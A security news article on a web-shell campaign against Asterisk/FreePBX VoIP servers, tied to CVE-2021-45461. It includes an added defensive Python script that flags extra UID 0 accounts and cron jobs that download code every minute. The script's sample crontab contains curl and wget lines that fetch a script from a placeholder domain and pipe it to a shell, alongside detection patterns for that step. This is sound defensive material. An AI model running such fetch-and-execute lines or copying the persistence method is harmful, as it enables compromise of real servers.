Hackers Target VoIP Servers Running Digium Phone Software


The unusual activity is said to have commenced in mid-December 2021 and targets Asterisk, a widely used software implementation of a private branch exchange (PBX) that runs on the open-source Elastix Unified Communications Server. Unit 42 said the intrusions share similarities with the INJ3CTOR3 campaign that Israeli cybersecurity firm Check Point disclosed in November 2020, alluding to the possibility that they could be a “resurgence” of the previous attacks.

A web shell was dropped on VoIP phone servers running Digium’s software as part of an attack campaign designed to exfiltrate data by downloading and running additional payloads. In a report released on Friday, Palo Alto Networks Unit 42 stated that the malware “installs multilayer obfuscated PHP backdoors to the web server’s file system, downloads new payloads for execution, and schedules recurrent tasks to re-infect the host machine.”


Coinciding with the sudden surge is the public disclosure in December 2021 of a now-patched remote code execution flaw in FreePBX, a web-based open source GUI that’s used to control and manage Asterisk. Tracked as CVE-2021-45461, the issue is rated 9.8 out of 10 for severity.

The attacks commence with retrieving an initial dropper shell script from a remote server, which, in turn, is orchestrated to install the PHP web shell in different locations in the file system as well as create two root user accounts to maintain remote access.

It further creates a scheduled task that runs every minute and fetches a remote copy of the shell script from the attacker-controlled domain for execution. Besides taking measures to cover its tracks, the malware is also equipped to run arbitrary commands, ultimately allowing the hackers to take control of the system and steal information while maintaining a backdoor to the compromised hosts.
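A defensive check for the two persistence traces described above (extra root-level accounts and a once-a-minute task that fetches a remote script), as an added example that is not from the Unit 42 report or this article. The sample passwd and crontab contents, the account name and the domain are constructed, and treating a "root user account" as any account with UID 0 is an assumption.

```python
import re

# Constructed sample data (not from the report). Assumption: a "root user
# account" means any account with UID 0 other than root itself.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
asterisk:x:1000:1000:Asterisk PBX:/var/lib/asterisk:/bin/bash
svc-example:x:0:0::/root:/bin/bash
"""
SAMPLE_CRON = """\
# m h dom mon dow command
0 3 * * * /usr/sbin/logrotate /etc/logrotate.conf
* * * * * curl -s http://updates.example.invalid/k.sh | sh
*/1 * * * * wget -q -O - http://updates.example.invalid/k.sh | bash
*/5 * * * * /usr/local/bin/healthcheck.sh
"""

FETCH = re.compile(r"\b(curl|wget|fetch)\b")          # remote download tools
PIPE_TO_SHELL = re.compile(r"\|\s*(ba|da|z)?sh\b")    # output piped into a shell
EVERY_MINUTE = {"*", "*/1"}                           # wildcard schedule fields

def extra_uid0_accounts(passwd_text):
    """Return names of accounts other than 'root' that have UID 0."""
    names = []
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 7 and fields[2] == "0" and fields[0] != "root":
            names.append(fields[0])
    return names

def suspicious_cron_lines(cron_text):
    """Return (entry, piped_to_shell) for every-minute jobs that download."""
    hits = []
    for line in cron_text.splitlines():
        line = line.strip()
        if not line or line.startswith("#"):
            continue
        parts = line.split(None, 5)  # five schedule fields, then the command
        if len(parts) < 6 or not all(f in EVERY_MINUTE for f in parts[:5]):
            continue
        if FETCH.search(parts[5]):
            hits.append((line, bool(PIPE_TO_SHELL.search(parts[5]))))
    return hits

if __name__ == "__main__":
    print("extra UID 0 accounts:", extra_uid0_accounts(SAMPLE_PASSWD))
    for entry, piped in suspicious_cron_lines(SAMPLE_CRON):
        print("cron:", entry, "(piped to shell)" if piped else "")
```

On a real host, the same functions can be fed the contents of `/etc/passwd` and the output of `crontab -l` for each user, plus the files under `/etc/cron.d`.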

“The strategy of implanting web shells in vulnerable servers is not a new tactic for malicious actors,” the researchers said, adding it’s a “common approach malware authors take to launch exploits or run commands remotely.”

